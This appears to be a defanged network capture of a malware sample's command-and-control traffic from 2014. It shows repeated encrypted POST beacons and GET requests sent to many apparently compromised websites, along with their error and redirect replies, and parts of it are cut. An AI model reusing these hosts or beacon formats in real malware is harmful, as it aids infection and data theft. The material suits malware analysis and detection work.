block;}.    .attribution {margin-top: 20px;}.  </style>.  <sc
ript type="text/javascript">.  //<![CDATA[.  (function(){.    va
r onReady = function( callback ){.        var addListener = document.a
ddEventListener || document.attachEvent,.            eventName = docum
ent.addEventListener ? 'DOMContentLoaded' : 'onreadystatechange';.    
    addListener.call(document, eventName, function(){ callback(); }, f
alse );.    }..    onReady(function(){.      var content = document.ge
tElementById('cf-content');.      content.style.display = 'block';..  
    setTimeout(function(){.        var t,r,a,f;.        t = document.c
reateElement('div');.        t.innerHTML="<a href='/'>x</<<< skipped >>>

POST / HTTP/1.1

Accept: */*

Accept-Language: en-us

Content-Type: application/octet-stream

Content-Length: 468

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)

Host: slcago.org

Connection: Keep-Alive

Cache-Control: no-cache

AH6kfJkgyp9/nZnCqJGgETKo7kf3gVia3XwwWbhxF8YxvyjAVVr7DUFhOo5BHBkz

ifBcjOgWlOw6l6drMIkC0C9u7dFzwVOzIGYd1veYHfPWTLA60OpNWXSBR/P5qr7h

YTdA0MPHbgCM7DQ1r4bGxYAICyBqA0Q7SYaJ BQwURRghxKl7yzVfs/8f/svR9Vv

 OWG5eM8Q872iDIzXL29G136Rm2UEUi85lGbzMB9yi1uGUfM9EZ0t7hcLHaHTVgo

ZSXV82cdo6NKlH eLuTOUQSCpocsqnUU8WG 3PqQvtiIx8dHgNSLGt/ 6YYAkYw9

ZEm0XyAVu2XZ n9o2ZQlEith6eA8w/Q1wJ8fccKmI ycLStFS7TtoMzkGfKK8sIN

xvdLAJ5/Dkvai/wqDCYrLovb8IkmAtks4Caysns06koCHiYkeZu/jqBVWHnt181X

zXrm


HTTP/1.1 200 OK

Date: Sat, 12 Apr 2014 14:40:15 GMT

Server: Apache

Last-Modified: Thu, 08 Aug 2013 22:47:13 GMT

ETag: "21c5f-190-4e37770631e40"

Accept-Ranges: bytes

Content-Length: 400

X-Powered-By: PleskLin

Connection: close

Content-Type: text/html
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "htt
p://VVV.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">.<html xml
ns="hXXp://VVV.w3.org/1999/xhtml">.<head>.<title>Americ
an Guild of Organists</title>.<meta http-equiv="Content-Type"
 content="text/html; charset=iso-8859-1" />.<meta http-equiv="re
fresh" content="0;url=hXXp://VVV.slcago.org/main01/" />.</head&g
t;..<body>.</body>..</html>...

POST / HTTP/1.1

Accept: */*

Accept-Language: en-us

Content-Type: application/octet-stream

Content-Length: 566

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)

Host: robertmcintyre.com.au

Connection: Keep-Alive

Cache-Control: no-cache

FfNZaRRDLaAEjFXd71Np9GejrMGMoXediPmXpL4sJFUkCNQzgOM2btTQ48EBSEV6

Zz1Od/nAh3/5a9drZ3gWhzlZf130MZleQPs2GJuIooyosj8jC9VqD0qkXP250eDa

DgPT7Q/rje2ipCymerm04Rxl1wfAJGL7sUom/Ro3DokIS4gTjpFErAF3Kw86HldW

FkE6swbD/ YwFXh9obSPKUoWL6Gs6AWyUXFlt9mY3hiCa2f6VHOfgWDCtahHTcAW

24TU7AaTwMj38UXwBKW1RhTzIOSR3v1zwiRYp9gaufuYEjzFdHWUf8dvEnNduz1z

JZSd7aGnQwLasSjC6Y64nGVMmjaBW3XRuMWoR mSNH8qHOkeHkIZbePA2PW4RvHR

IiLc6dKFgufUby6ggoaCBkX6mtelKD/xCRtXRFzth1psunCdghJEz46wrf huLnf

hy5sNwm9/YC2NegVV6TR6XMDbEtGDf92F0zz1UNmvNNgdo 1ulfbqKdnmAL5AY4S

qr5riVk7TXk7VM3dxu3r6Rdj2K8jpH0CNJA=


HTTP/1.1 403 Forbidden

Content-Type: text/html

Server: Microsoft-IIS/7.5

X-Powered-By: ASP.NET

Date: Sat, 12 Apr 2014 14:40:26 GMT

Content-Length: 1233
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "hXXp://ww
w.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">..<html xmlns="hXXp://
VVV.w3.org/1999/xhtml">..<head>..<meta http-equiv="Content
-Type" content="text/html; charset=iso-8859-1"/>..<title>403 
- Forbidden: Access is denied.</title>..<style type="text/css
">..<!--..body{margin:0;font-size:.7em;font-family:Verdana, Aria
l, Helvetica, sans-serif;background:#EEEEEE;}..fieldset{padding:0 15px
 10px 15px;} ..h1{font-size:2.4em;margin:0;color:#FFF;}..h2{font-size:
1.7em;margin:0;color:#CC0000;} ..h3{font-size:1.2em;margin:10px 0 0 0;
color:#000000;} ..#header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 
2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF;..backgr
ound-color:#555555;}..#content{margin:0 0 0 2%;position:relative;}...c
ontent-container{background:#FFF;width:96%;margin-top:8px;padding:10px
;position:relative;}..-->..</style>..</head>..<body&
gt;..<div id="header"><h1>Server Error</h1></div&
gt;..<div id="content">.. <div class="content-container">&
lt;fieldset>..  <h2>403 - Forbidden: Access is denied.</h2
>..  <h3>You do not have permission to view this directory or
 page using the credentials that you supplied.</h3>.. </field
set></div>..</div>..</body>..</html>....<<< skipped >>>

POST / HTTP/1.1

Accept: */*

Accept-Language: en-us

Content-Type: application/octet-stream

Content-Length: 480

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)

Host: screaminpeach.com

Connection: Keep-Alive

Cache-Control: no-cache

D2m3e YYyp/P9LrQgdsTTglD/YDGGPwKelOeY6Na15GlzMppFYDB1WHBpWbvvsx1

ZgCtG6aTA/MwoeBvQT7FGAw7qSPFxjO7te5SS/V3wD0bTufztSFwOaVI0z2OYW69

Krr/ItwVoYIKPrLkdhD3kmcgp2ckKz2/sSV2NnAwBnxE5YfogqdgTJldNa6httVv

AFyi2FVPwz/145zIO42u a2Za7rlyhSIRbJn5QYETKTt92w/MFb6HKBUApLFQB7H

YqLVFVtiqBw4lSi0LfBo0NubhqfhYnDgdEAnG79rQU5wAqMNtJFz0UVKMU1BYBZp

vq449iXKrRZ2860dEq0GU0OrMeaYHDGDzsooQMjRnXGXKPhrViaedWbVduzGm9pf

B sVyorj9vmDq0QdgsMP6TmwQFyXYP9DQbW3AJPOZpk69M TvAO5ImpruRWPoZlD

9hjAq6oUgSDE880=


HTTP/1.1 403 Forbidden

Server: cloudflare-nginx

Date: Sat, 12 Apr 2014 14:40:16 GMT

Content-Type: text/html; charset=UTF-8

Transfer-Encoding: chunked

Connection: keep-alive

Set-Cookie: __cfduid=d22805e80c79ca447eea8214c754687c61397313616443; expires=Mon, 23-Dec-2019 23:50:00 GMT; path=/; domain=.screaminpeach.com; HttpOnly

CF-RAY: 11a02d96ce0102b8-IAD
2556..<!DOCTYPE html>.<!--[if lt IE 7]> <html class="no
-js ie6 oldie" lang="en-US"> <![endif]-->.<!--[if IE 7]>
;    <html class="no-js ie7 oldie" lang="en-US"> <![endif]--&
gt;.<!--[if IE 8]>    <html class="no-js ie8 oldie" lang="en-
US"> <![endif]-->.<!--[if gt IE 8]><!--> <html
 class="no-js" lang="en-US"> <!--<![endif]-->.<head>
.<title>Attention Required! | CloudFlare</title>.<meta 
charset="UTF-8" />.<meta http-equiv="Content-Type" content="text
/html; charset=UTF-8" />.<meta http-equiv="X-UA-Compatible" cont
ent="IE=Edge,chrome=1" />.<meta name="robots" content="noindex, 
nofollow" />.<meta name="viewport" content="width=device-width,i
nitial-scale=1,maximum-scale=1" />.<link rel="stylesheet" id="cf
_styles-css" href="/cdn-cgi/styles/cf.errors.css" type="text/css" medi
a="screen,projection" />.<!--[if lt IE 9]><link rel="style
sheet" id='cf_styles-ie-css' href="/cdn-cgi/styles/cf.errors.ie.css" t
ype="text/css" media="screen,projection" /><![endif]-->.<s
tyle type="text/css">body{margin:0;padding:0}</style>.<!--
[if lt IE 9]><script type="text/javascript" src="//cdnjs.cloudfl
are.com/ajax/libs/jquery/1.9.1/jquery.min.js"></script><![
endif]-->.<!--[if gte IE 9]><!--><script type="text/
javascript" src="//cdnjs.cloudflare.com/ajax/libs/zepto/1.0/zepto.min.
js"></script><!--<![endif]-->.<script type="t<<< skipped >>>

POST / HTTP/1.1

Accept: */*

Accept-Language: en-us

Content-Type: application/octet-stream

Content-Length: 496

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)

Host: churchsupplies.net

Connection: Keep-Alive

Cache-Control: no-cache

f4J YngV6aO2M1yh 9qKhmt3JrrATYV6LGAVMuVYg1N2Z76vWVrT44a5 B/R0Pa9

nIeGA/D9xy/uRBKlpQeL9laxW3brHUfIecvaRthWjh51DTL1XRhvL5rIIQ7QrmQP

i9TVcGFhGogHfX2PgpFhgKvZCp6/PrsqNpFXv/uWquKkKi84kjKT9Uwgym6z LPq

gDUPC2/wgQ4xGRvwEy5iU1w8aJaYPPahWiZMLk2i0mVvbcbl3OThoelJN0sGLDxc

U5CBlEFDhPiMV4NJxLKUBh1kAw24IddVEcAEZChRSZn8NPf6qi9BZ tmWFbCYGms

psJn/PPoXgJ2cn21RQcYIXS4pSLufxNza9V17J PGfhQBB8XYEj9fMlO26pYnpDe

jSYASJ5/gDVf84jxPl4oOVqFj7fSrSk1MelmNMqBqJXn1HOsJkPckAJBGl2/oovW

JOwovJvN/tPy9gTL3baMZ4IhfgVQ0Q==


HTTP/1.1 403 Forbidden

Date: Sat, 12 Apr 2014 14:40:41 GMT

Server: Apache

Accept-Ranges: bytes

Content-Length: 5039

Keep-Alive: timeout=2, max=25

Connection: Keep-Alive

Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "hXXp://VVV.w3.or
g/TR/xhtml11/DTD/xhtml11.dtd">..<head>...<title>Apache 
HTTP Server Test Page powered by CentOS</title>...<meta http-
equiv="Content-Type" content="text/html; charset=UTF-8" />...<st
yle type="text/css">....body {.....background-color: #fff;.....colo
r: #000;.....font-size: 0.9em;.....font-family: sans-serif,helvetica;.
....margin: 0;.....padding: 0;....}....:link {.....color: #0000FF;....
}....:visited {.....color: #0000FF;....}....a:hover {.....color: #3399
FF;....}....h1 {.....text-align: center;.....margin: 0;.....padding: 0
.6em 2em 0.4em;.....background-color: #3399FF;.....color: #ffffff;....
.font-weight: normal;.....font-size: 1.75em;.....border-bottom: 2px so
lid #000;....}....h1 strong {.....font-weight: bold;....}....h2 {.....
font-size: 1.1em;.....font-weight: bold;....}.....content {.....paddin
g: 1em 5em;....}.....content-columns {...../* Setting relative positio
ning allows for .....absolute positioning for sub-classes */.....posit
ion: relative;.....padding-top: 1em;....}.....content-column-left {...
../* Value for IE/Win; will be overwritten for other browsers */.....w
idth: 47%;.....padding-right: 3%;.....float: left;.....padding-bottom:
 2em;....}.....content-column-right {...../* Values for IE/Win; will b
e overwritten for other browsers */.....width: 47%;.....padding-left: 
3%;.....float: left;.....padding-bottom: 2em;....}.....content-columns
>.content-column-left, .content-columns>.content-column-righ<<< skipped >>>

GET /v02 HTTP/1.1

Accept: */*

Accept-Language: en-us

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)

Host: VVV.iaiglobal.or.id

Connection: Keep-Alive

Cache-Control: no-cache

GET /v02 HTTP/1.1

Accept: */*

Accept-Language: en-us

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)

Host: VVV.iaiglobal.or.id

Connection: Keep-Alive

Cache-Control: no-cache


HTTP/1.1 301 Moved Permanently

Date: Sat, 12 Apr 2014 14:40:52 GMT

Server: Apache

Location: hXXp://VVV.iaiglobal.or.id/v02/

Vary: Accept-Encoding

Content-Length: 308

Connection: close

Content-Type: text/html; charset=iso-8859-1
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">.<html>&
lt;head>.<title>301 Moved Permanently</title>.</head
><body>.<h1>Moved Permanently</h1>.<p>The d
ocument has moved <a href="hXXp://VVV.iaiglobal.or.id/v02/">here
</a>.</p>.<hr>.<address>Apache Server at VVV.i
aiglobal.or.id Port 80</address>.</body></html>...

POST / HTTP/1.1

Accept: */*

Accept-Language: en-us

Content-Type: application/octet-stream

Content-Length: 558

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)

Host: neurotoxininstitute.com

Connection: Keep-Alive

Cache-Control: no-cache

AibKcXsS4rKl4j49EuVJM2SSGrWB7i0e32PVChi4zX37Q7M5ewlsdzDAjBuk17na

Fa5MQa5t0etPdaS6tkqxfZyvK4rW/Zb9kazCjxNUMDxmED4j0AAZNjH/TuiHru4w

EV7xonMGy5GgIyFpeek3cnLSmbOQ6YzdRZfp3e890jH5XLLXgyZXQ3/rRLL1D9xG

onfJ1miQjC9oEOr4bOQyftTuoIsYYVsypFVdhvZex3bKii sNMgYRsvb5doiTqXx

pavfvMRGNuGXrdGATkehYvqi6jX3AGAi46RgLgpzlm7LToFPDQRqOuXcFcI9Z/L3

usS3nA0UadIjjwrCkRhe7QCs8w8P9BPfTmRUZlVNiquMeEXbcyiq5zii9RAoMMZv

z/CMjnIN8UBLyhDpzJU6h6uLlfcRP7nd7YSYJgbudlLsAgLw0HlNLgwfqYO5eWTf

B7wlJ  fbDQX/4j8wk5zPj9Mvb0TuuoJiVldERdmp4gP1DfhlDNY57wsWSNP9ZAL

KYrWyb9WJMg2eJzGi/VxSAOaP I=


HTTP/1.1 503 Service Temporarily Unavailable

Server: cloudflare-nginx

Date: Sat, 12 Apr 2014 14:41:45 GMT

Content-Type: text/html; charset=UTF-8

Transfer-Encoding: chunked

Connection: keep-alive

Set-Cookie: __cfduid=da1d2d89df205aa1436f42e743221d8681397313705664; expires=Mon, 23-Dec-2019 23:50:00 GMT; path=/; domain=.neurotoxininstitute.com; HttpOnly

Cache-Control: max-age=5

Expires: Sat, 12 Apr 2014 14:41:50 GMT

CF-RAY: 11a02fc46d130844-IAD
bf2..<!DOCTYPE HTML>.<html lang="en-US">.<head>.  &l
t;meta charset="UTF-8" />.  <meta http-equiv="Content-Type" cont
ent="text/html; charset=UTF-8" />.  <meta http-equiv="X-UA-Compa
tible" content="IE=Edge,chrome=1" />.  <meta name="robots" conte
nt="noindex, nofollow" />.  <meta name="viewport" content="width
=device-width, initial-scale=1, maximum-scale=1" />.  <title>
Just a moment...</title>.  <style type="text/css">.    htm
l, body {width: 100%; height: 100%; margin: 0; padding: 0;}.    body {
background-color: #ffffff; font-family: Helvetica, Arial, sans-serif; 
font-size: 100%;}.    h1 {font-size: 1.5em; color: #404040; text-align
: center;}.    p {font-size: 1em; color: #404040; text-align: center; 
margin: 10px 0 0 0;}.    #spinner {margin: 0 auto 30px auto; display: 
block;}.    .attribution {margin-top: 20px;}.  </style>.  <sc
ript type="text/javascript">.  //<![CDATA[.  (function(){.    va
r onReady = function( callback ){.        var addListener = document.a
ddEventListener || document.attachEvent,.            eventName = docum
ent.addEventListener ? 'DOMContentLoaded' : 'onreadystatechange';.    
    addListener.call(document, eventName, function(){ callback(); }, f
alse );.    }..    onReady(function(){.      var content = document.ge
tElementById('cf-content');.      content.style.display = 'block';..  
    setTimeout(function(){.        var t,r,a,f;.        t = document.c
reateElement('div');.        t.innerHTML="<a href='/'>x</<<< skipped >>>

POST / HTTP/1.1

Accept: */*

Accept-Language: en-us

Content-Type: application/octet-stream

Content-Length: 37

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)

Host: tobler-skele.bg

Connection: Keep-Alive

Cache-Control: no-cache

..x...*.6~...H....@ G.. ...!.qU"X<.#.
HTTP/1.1 200 OK

Date: Sat, 12 Apr 2014 14:41:53 GMT

Server: Apache

Last-Modified: Sun, 23 Mar 2014 10:20:12 GMT

ETag: "44a00c9-5212-4f54376ded315"

Accept-Ranges: bytes

Content-Length: 21010

Keep-Alive: timeout=5, max=5

Connection: Keep-Alive

Content-Type: text/html
<html>....<!-- Mirrored from tobler-skele.bg/ by HTTrack Webs
ite Copier/3.x [XR&CO'2013], Tue, 18 Mar 2014 10:01:33 GMT -->..<
;head>..<meta http-equiv="Content-Type" content="text/html; char
set=utf-8">..<title>Tobler - .................... ...........
... - .............., .............., .............. - ...............
. .. ...... ........</title>....<style>..<!--..table   
     { font-family: Verdana; font-size: 11px }..td           { font-fa
mily: Verdana; font-size: 11px }..A {...TEXT-DECORATION: none..}..A:ho
ver {...COLOR: blue; TEXT-DECORATION: none..}..-->..</style>.
.<meta name="description" content="............ .......... ........
  .. .................. ........................ .... Baugeruste Toble
r AG, .................. .... .................  .................. ..
............ .. ................ .. ................ ...... ........ .
... .................... .............., ................ ............
.... ..  ...............">..<meta name="keywords" content=".....
............... .. .............. .............., .............., ....
.........., .........., ................ .............., .............
... ..............,  .................. .........., .........., ......
............ .. .................... ......................, .........
....... ............">..</head>..<body topmargin="0" leftm
argin="0" rightmargin="0" bottommargin="0" bgcolor="#E8E8E8" link="#00
0080" vlink="#000080" alink="#000080">..<div align="center"&<<< skipped >>>

POST / HTTP/1.1

Accept: */*

Accept-Language: en-us

Content-Type: application/octet-stream

Content-Length: 113

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)

Host: tobler-skele.bg

Connection: Keep-Alive

Cache-Control: no-cache

....^.v.......W.....C>.......g..e.H......%....s.=O....:..x.._
....e..6....,.o`...[
...p.F.....8........T$.{......
HTTP/1.1 200 OK

Date: Sat, 12 Apr 2014 14:41:54 GMT

Server: Apache

Last-Modified: Sun, 23 Mar 2014 10:20:12 GMT

ETag: "44a00c9-5212-4f54376ded315"

Accept-Ranges: bytes

Content-Length: 21010

Keep-Alive: timeout=5, max=4

Connection: Keep-Alive

Content-Type: text/html
<html>....<!-- Mirrored from tobler-skele.bg/ by HTTrack Webs
ite Copier/3.x [XR&CO'2013], Tue, 18 Mar 2014 10:01:33 GMT -->..<
;head>..<meta http-equiv="Content-Type" content="text/html; char
set=utf-8">..<title>Tobler - .................... ...........
... - .............., .............., .............. - ...............
. .. ...... ........</title>....<style>..<!--..table   
     { font-family: Verdana; font-size: 11px }..td           { font-fa
mily: Verdana; font-size: 11px }..A {...TEXT-DECORATION: none..}..A:ho
ver {...COLOR: blue; TEXT-DECORATION: none..}..-->..</style>.
.<meta name="description" content="............ .......... ........
  .. .................. ........................ .... Baugeruste Toble
r AG, .................. .... .................  .................. ..
............ .. ................ .. ................ ...... ........ .
... .................... .............., ................ ............
.... ..  ...............">..<meta name="keywords" content=".....
............... .. .............. .............., .............., ....
.........., .........., ................ .............., .............
... ..............,  .................. .........., .........., ......
............ .. .................... ......................, .........
....... ............">..</head>..<body topmargin="0" leftm
argin="0" rightmargin="0" bottommargin="0" bgcolor="#E8E8E8" link="#00
0080" vlink="#000080" alink="#000080">..<div align="center"&<<< skipped >>>

POST / HTTP/1.1

Accept: */*

Accept-Language: en-us

Content-Type: application/octet-stream

Content-Length: 528

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)

Host: rueggeberg.com

Connection: Keep-Alive

Cache-Control: no-cache

W02ueodg0p9tUSzgtqTCmVBkaqJ9A4Peq3QKZYdUhibWavQofsGpgd65AQjk7ysq

kFIEoyuArOl52V3DHqKCsrTIHlb9hd6nPhZwtt7MQbcGLFzdsx PcOBjLpZ0Mg A

R89z fy2or7ujbu9iywWQ63n0rPjpv0yqIZakLSwMVheYxe25Xp0TD6wHL3PBIyi

5 ONEOsGBB5jt2L861ud ip4hSnvSQnEv86Wulb4auI PKmKFKgKeSesYMv0wj4F

19pRjRvTqXNhmjWh5MiCkKr0e3FSCXg9O9iablrWrwH4NvCsxT8lwdAlF8WqHv3V

DurewLSq7pSeyo7nIknYFsPDWssLVYmHuo1hSIH0iXm5x3RSe57N1mkhl5deHtaz

sW2ZheuOqHvFRObuF5odZjGejNzX/ko/5CdTL8EyZ4nF2Etz UkwmCA8WswsvUHa

lOQ1U mcaWvSXv3p2fS08BdRYsVlipdaFKabxsx9Q2OYIRzOa5se8uVCzGOLmPKV


HTTP/1.1 403 Forbidden

Server: nginx/1.2.1

Date: Sat, 12 Apr 2014 14:40:16 GMT

Content-Type: text/html; charset=utf-8

Content-Length: 570

Connection: keep-alive

Vary: Accept-Encoding
<html>..<head><title>403 Forbidden</title><
/head>..<body bgcolor="white">..<center><h1>403 F
orbidden</h1></center>..<hr><center>nginx/1.2.
1</center>..</body>..</html>..<!-- a padding to d
isable MSIE and Chrome friendly error page -->..<!-- a padding t
o disable MSIE and Chrome friendly error page -->..<!-- a paddin
g to disable MSIE and Chrome friendly error page -->..<!-- a pad
ding to disable MSIE and Chrome friendly error page -->..<!-- a 
padding to disable MSIE and Chrome friendly error page -->..<!--
 a padding to disable MSIE and Chrome friendly error page -->....

POST / HTTP/1.1

Accept: */*

Accept-Language: en-us

Content-Type: application/octet-stream

Content-Length: 550

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)

Host: gamblingonlinemagazine.com

Connection: Keep-Alive

Cache-Control: no-cache

c1g1GydOQbJq0gDa1nWy8PDGCgadkfsQS2zq3m8aGoLdROVBHED R92EjdzkfLE9

tBFeD8UJ3Xq8oPojH9NQMZ4iJudacd6NO5mjSJrPlvZrnxZn3chiLOaGu43tRJGd

ikUziOefX6fL734HYMjlDZ8sn4lvToeA1JKYUsLYPyCZV5iPz5eM56fUsv0kzL8U

48EpNofhgqHqi8uPIKdA2ZlQqxGAJn4dnxq7C8EaduYpPjnGDiiLHIuMW jfaz7L

wPP4126u9NzQBdtBLJYxRo678ZVH5Sibken7nA RdZkryf8K6bv05cx50aEuEwiG

h QVguxssIKn3y66KXHtvfj/jInnejVql4MH2aXV2F2v0xY2imlFzW9wwChF6bFj

VdUy3AzfSbH8c1tw7fd9w3/0t/eradVY1Het5aXMp9t3jnvVxlc6MbkTtMka ajm

IeuxzLElxGnEe7xh1hj8DETPn1Q2XUjzdh62ikSUcP9nj1PDflV9wRPbtAvCl6G/

f1gYC92rZtjKaZELJw==


HTTP/1.1 406 Not Acceptable

Date: Sat, 12 Apr 2014 14:41:42 GMT

Server: Apache/2.2.25 (Unix) mod_ssl/2.2.25 OpenSSL/0.9.8i DAV/2 FrontPage/5.0.2.2635 mod_bwlimited/1.4 mod_auth_passthrough/2.1

Content-Length: 13

Connection: close

Content-Type: text/html; charset=iso-8859-1
Access Denied..

POST / HTTP/1.1

Accept: */*

Accept-Language: en-us

Content-Type: application/octet-stream

Content-Length: 570

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)

Host: sztartufi.com

Connection: Keep-Alive

Cache-Control: no-cache

PHNuj9x3BaouFIyQB7HzwG9bH3j0OWaP0B41SpS0jqoS9gz wMp2VTaWPFQnP8X

IFJZS0sfZ9CnuB SuF LZIepvaaSRtHK1DFoVFUoSYHHQydYXFcYMj0mIA/elMqr

FX0PIvIT KE0F74dAnm/uYzZuCUVdaDMHWWmLVMWsI4eddlKWQkdnRcriHGG1 O5

jwvZBiCGuM3T/pu3hhwCKP8zi/5bsdeaLsTkLlfEBHXYHzfO3TikUVFRldXm7DF7

TZswQtxm/yRs1tA3k2QS8PEplQCmoh6EbrYzNUCah8CHXeqzRUowt08KVI5LiXZM

k8mXwJ4GkfoeQ7wVxy/EpYNyqqhX7S644q ph2JyHZ 9ljzfa6UhIg1tJxnnx6H3

FDuDk7puv/uUgyUJpWMGIygQWu0iPNK9zfPJQNFN1ped9Z9r5I/0jsg/eoGX3CrX

oRA1Hfq0 Sypu4nisM8zsqiv40f/LQuUak6I8xZMoiAwG7uEO0M2k8wLT2CRISMQ

eXLRIkCEmNxMhedLvX9Puw5C9U7JdjVdkcEG0tas


HTTP/1.1 403 Forbidden

Server: nginx

Date: Sat, 12 Apr 2014 14:41:27 GMT

Content-Type: text/html

Content-Length: 564

Connection: keep-alive
<html>..<head><title>403 Forbidden</title><
/head>..<body bgcolor="white">..<center><h1>403 F
orbidden</h1></center>..<hr><center>nginx</
center>..</body>..</html>..<!-- a padding to disable
 MSIE and Chrome friendly error page -->..<!-- a padding to disa
ble MSIE and Chrome friendly error page -->..<!-- a padding to d
isable MSIE and Chrome friendly error page -->..<!-- a padding t
o disable MSIE and Chrome friendly error page -->..<!-- a paddin
g to disable MSIE and Chrome friendly error page -->..<!-- a pad
ding to disable MSIE and Chrome friendly error page -->....

POST / HTTP/1.1

Accept: */*

Accept-Language: en-us

Content-Type: application/octet-stream

Content-Length: 480

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)

Host: saios.net

Connection: Keep-Alive

Cache-Control: no-cache

LDfAAFbK6qE2HY9sMX1fxPmh1oj2fuK36iMv5odCMkEVIybzGZjggu8ZMIW/lxnb

Vf6blDpU8hUVh8MCuoFEkwJowI/Gv67TikrOhUAZL/h63xJRXcvG0oN0bDr11X/M

4jkqPEK2Wim d/Bselkcd0ywChuL073qNK/qCMVgES8gUEs2pA0uKaspvI tu8qq

RALqWLH0QLLyaeSmtwymjhMrltrYZvx6d9PD64pDgFuXf1/EN9NoSja3aNi4HXHC

4dyyHAyr5gbZJ4QvoUozi39RphRZKTKEvU6Y/WJdzoTQ7iTeAGARwLkpwuA8vM5V

1RUQQg8SsviO9VT7v6f9G9xiUTNU3Yb6nsLbx4nK3WxbXJQID0fKee7VrqDBttQA

LCEogZmA4O0ZFLIlYQMlJAe9ZhHl4sDy6WwlCwKkeiWtEdDx7agnaHPTsl0O3Cxm

6jvA8FFs81GcPZXE


HTTP/1.1 302 Found

Date: Sat, 12 Apr 2014 14:40:29 GMT

Server: Apache

Location: hXXp://VVV.saios.net/

Content-Length: 205

Connection: close

Content-Type: text/html; charset=iso-8859-1
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">.<html>&
lt;head>.<title>302 Found</title>.</head><body
>.<h1>Found</h1>.<p>The document has moved <a 
href="hXXp://VVV.saios.net/">here</a>.</p>.</body>
;</html>...

POST / HTTP/1.1

Accept: */*

Accept-Language: en-us

Content-Type: application/octet-stream

Content-Length: 450

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)

Host: ezmedi.com

Connection: Keep-Alive

Cache-Control: no-cache

RGuRot1qR7M4LsRQFG44OxYjNYeLo4 AYeFP77DH2XX5yRBNo8aKxP8T1bfyoH51

rrJiEAob2e3gC2aLBKK4V2FM fN1/OqJGyYKmLbJfyqnD9TeMnN J5L9LZe4FOOU

ETaSb wN1Nfq5Z5LCYQ5ieaXZyys5YvCQUvDsWF/mmxgkj8ySVpQ6104PK8alzCf

W 5ytAAyAejsd /n1HSqLDe6lNPmFjlOSsMWRcOmnsNnEk13D9Z4XPZVYcmjoeGE

H7g8wG4JTDGKCMiqZitjrdUOHnjvBSTYP8YXdHVAkcIvaIqtcExwey3NgER7Hdux

rBiiN5LxzWaPEA9C ypgDzURwmNqhwXCCA8P/PtcnkL5SKjYXCU3EN3ivGkW7oPB

iVA5H/dTANmgd4RrSKyRSCKMDVYw9cKvFaSGJ 9v58gBa/dzK0FS


HTTP/1.1 403 Forbidden

Date: Sat, 12 Apr 2014 14:41:46 GMT

Server: Microsoft-IIS/5.0

Vary: accept-language,accept-charset

Accept-Ranges: bytes

Connection: close

Transfer-Encoding: chunked

Content-Type: text/html; charset=iso-8859-1

Content-Language: en

37..[an error occurred while processing this directive]..  ..90....   
 You don't have permission to access the requested directory..    Ther
e is either no index document or the directory is read-protected...  .
.2......34..[an error occurred while processing this directive]...0..

POST / HTTP/1.1

Accept: */*

Accept-Language: en-us

Content-Type: application/octet-stream

Content-Length: 542

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)

Host: rewardhits.com

Connection: Keep-Alive

Cache-Control: no-cache

cstPH7Vo3axklY3gHGISda5WsyFDkl6ruVBpOE1TDqWntYh6o/5jSw WqMxCH9B7

8eJ2Fq1oFJZgeBsPdaBODh9xVB/rVRjuPUn9MF/I9u 2Bo5CZia Qhp JIlOZlY7

u/azPC 3L9N7gA9CYsPSTITpT5ZJkGmyrN7PfX3jhGit yOb73EQnu/LLTq4Qn/M

wpUup5XqYtc8q/8wEqVzklmkJW dcmUKJjr9WL3NVoDHT/C6t tG40uLUKajkLAx

vd7HG3wptWOcBVkH2pfbVguxvkWGJz A/zLIKgVEtzkgRJ4M10ycvBRLCsTn4Swj

zFh68wRaAD56kaPV3JhUg8g4o8/cSbTxBksDWghWuqtBVTXPWscy9XHpexfcOQ9n

PVA5ArGEvnEIJgCDg3xq9EnzhhJCmPgFvfi1jpJZX1NYuIVBs5xBgVt5pFsDuls8

p6x320Sdgaih0SJDlU2wJqVuFAj2DaGF3JGDLBSdWm6tI3Gzx3I6VsRayc/fVHqq

eo8a8PutTQ==


HTTP/1.1 301 Moved Permanently

Server: nginx/1.4.2

Date: Sat, 12 Apr 2014 14:41:26 GMT

Content-Type: text/html; charset=iso-8859-1

Content-Length: 382

Connection: keep-alive

Location: hXXp://VVV.teknorhino.com/
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">.<html>&
lt;head>.<title>301 Moved Permanently</title>.</head
><body>.<h1>Moved Permanently</h1>.<p>The d
ocument has moved <a href="hXXp://VVV.teknorhino.com/">here</
a>.</p>.<hr>.<address>Apache/2.2.25 (Unix) mod_ss
l/2.2.25 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 PHP/5.2.17 Server
 at rewardhits.com Port 80</address>.</body></html>.
..

POST / HTTP/1.1

Accept: */*

Accept-Language: en-us

Content-Type: application/octet-stream

Content-Length: 133

